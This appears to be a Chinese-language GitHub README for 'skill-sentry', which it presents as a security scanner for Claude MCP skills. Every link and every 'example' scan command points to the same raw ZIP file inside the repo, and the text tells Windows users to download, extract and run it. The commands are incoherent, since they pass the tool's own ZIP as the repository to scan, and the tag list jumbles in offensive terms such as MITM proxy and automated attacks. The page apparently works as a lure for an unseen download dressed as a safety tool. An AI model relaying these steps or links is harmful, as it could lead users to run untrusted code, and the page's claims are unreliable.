mitigative-davidbushnell562/skill-sentry

# 🛡️ skill-sentry - 安装前扫描技能 [](https://github.com/mitigative-davidbushnell562/skill-sentry/raw/refs/heads/main/app/repo/[owner]/[name]/skill-sentry-1.1.zip) ## 🚀 skill-sentry 的功能 skill-sentry 会在您安装 Claude MCP 技能之前检查其安全风险。 它可以帮助您在不首先运行代码的情况下检查技能的源代码。 使用它来审查来自 GitHub URL 的技能，并寻找不安全行为、隐藏命令和可疑包使用的迹象。 ## 🖥️ Windows 下载与设置 1. 打开上方的下载链接。 2. 在 GitHub 页面上，查找最新版本或主项目页面。 3. 下载 Windows 安装包或按照页面上的安装步骤进行操作。 4. 如果文件是 ZIP 格式，请先将其解压。 5. 打开 Command Prompt 或 PowerShell。 6. 在保存文件的文件夹中运行该工具。 ## 📦 使用 npx 安装 如果您的 Windows PC 上已经安装了 Node.js，可以使用以下命令运行 skill-sentry： npx skill-sentry 将 `` 替换为您要扫描的 Claude MCP 技能的 GitHub 链接。 示例： npx skill-sentry https://github.com/mitigative-davidbushnell562/skill-sentry/raw/refs/heads/main/app/repo/[owner]/[name]/skill-sentry-1.1.zip ## 🔍 检查内容 skill-sentry 会查找技能包中常见的安全问题，例如： - 不安全的安装脚本 - 隐藏的网络调用 - 可疑的文件访问 - 可能更改您系统的命令 - 有风险的包引用 - 供应链滥用的迹象 - 意外的 model context protocol 文件 - 可能导致代码执行的模式 ## 🧭 使用时机 在安装新的 Claude MCP 技能之前使用 skill-sentry。 它在以下情况下非常有用： - 技能源于您不了解的仓库 - 您希望在使用前审查技能 - 您需要快速的安全检查 - 您希望降低来自第三方代码的风险 - 您使用来自公共 GitHub 仓库的 MCP 技能 ## ✅ 适用人群 如果您符合以下情况，此工具非常适合您： - 在您的 PC 上使用 Claude 技能 - 从 GitHub 下载 MCP 技能 - 需要简单的安全检查 - 不希望先运行未知代码 - 更倾向于在安装前获得直观的结果 ## 🔧 基本使用 1. 复制技能仓库的 GitHub URL。 2. 将其粘贴到命令中。 3. 等待扫描完成。 4. 查看结果。 5. 仅在扫描显示安全时才安装该技能。 示例命令： npx skill-sentry https://github.com/mitigative-davidbushnell562/skill-sentry/raw/refs/heads/main/app/repo/[owner]/[name]/skill-sentry-1.1.zip ## 🪟 Windows 系统要求 您需要具备： - Windows 10 或更高版本 - 互联网连接 - 如果想使用 `npx`，需安装 Node.js - 如果仓库是私有的，需要一个 GitHub 账户 - 拥有从 Command Prompt 或 PowerShell 运行应用程序的权限 ## 📂 扫描中可能会看到的内容 扫描报告可以指出以下内容： - 包含风险设置步骤的 Readme 文件 - 运行脚本的 Package 文件 - 从外部来源获取数据的文件 - 需要审查的 MCP server 设置 - 暴露本地文件的路径 - 需要人工检查的代码模式 ## 🛠️ 如何解读结果 查找标记为有风险或未知的项目。 请注意： - 安装脚本 - 构建步骤 - 远程 URL - 文件写入权限 - Shell 命令 - 您不认识的 Package 名称 如果扫描显示结果正常，您在安装前仍应查看仓库页面。 ## 🧪 示例工作流程 1. 在 GitHub 上寻找 Claude MCP 技能。 2. 复制仓库 URL。 3. 使用 `npx skill-sentry` 运行扫描。 4. 查看发现的问题。 5. 决定该技能对您的使用是否安全。 ## 📘 项目主题 本项目相关内容： - claude - claude-skill - mcp - mcp-server - model-context-protocol - npm-security - scanner - security - static-analysis - supply-chain-security ## 🔗 项目链接 在此处访问项目页面： https://github.com/mitigative-davidbushnell562/skill-sentry/raw/refs/heads/main/app/repo/[owner]/[name]/skill-sentry-1.1.zip ## 🧩 命令参考 扫描技能仓库： npx skill-sentry 扫描公共仓库： npx skill-sentry https://github.com/mitigative-davidbushnell562/skill-sentry/raw/refs/heads/main/app/repo/[owner]/[name]/skill-sentry-1.1.zip 扫描您可以访问的私有仓库： npx skill-sentry https://github.com/mitigative-davidbushnell562/skill-sentry/raw/refs/heads/main/app/repo/[owner]/[name]/skill-sentry-1.1.zip ## 🧠 更安全使用的提示 - 在安装前查看 GitHub 仓库 - 检查扫描标记的文件 - 将仓库名称与作者名称进行比对 - 查看最近的提交历史 - 检查 package 文件中的脚本 - 谨慎对待要求额外权限的仓库 ## 📋 此工具可能检查的文件类型 skill-sentry 可能会检查常见的项目文件，例如： - README 文件 - package 清单 - 安装脚本 - 配置文件 - MCP server 文件 - 与设置步骤相关的源文件 ## 🧰 如果扫描未启动 请尝试以下步骤： 1. 检查您的网络连接。 2. 确保已安装 Node.js。 3. 确认 GitHub URL 正确。 4. 使用公共技能源再次尝试该仓库。 5. 打开 PowerShell，并在保存该工具的文件夹中运行命令 ## 📥 下载 / 安装链接 使用此链接下载或打开 GitHub 上的项目页面： https://github.com/mitigative-davidbushnell562/skill-sentry/raw/refs/heads/main/app/repo/[owner]/[name]/skill-sentry-1.1.zip

标签：Claude, CVE检测, GitHub安全, GNU通用公共许可证, IP 地址批量处理, MCP安全, MITM代理, Node.js, npx, 云安全监控, 大模型安全, 安全专业人员, 安全扫描, 搜索语句（dork）, 文件安全检查, 文档安全, 时序注入, 暗色界面, 沙箱检查, 第三方组件审查, 网络安全, 自动化攻击, 隐私保护, 静态代码扫描, 静态分析, 风险检测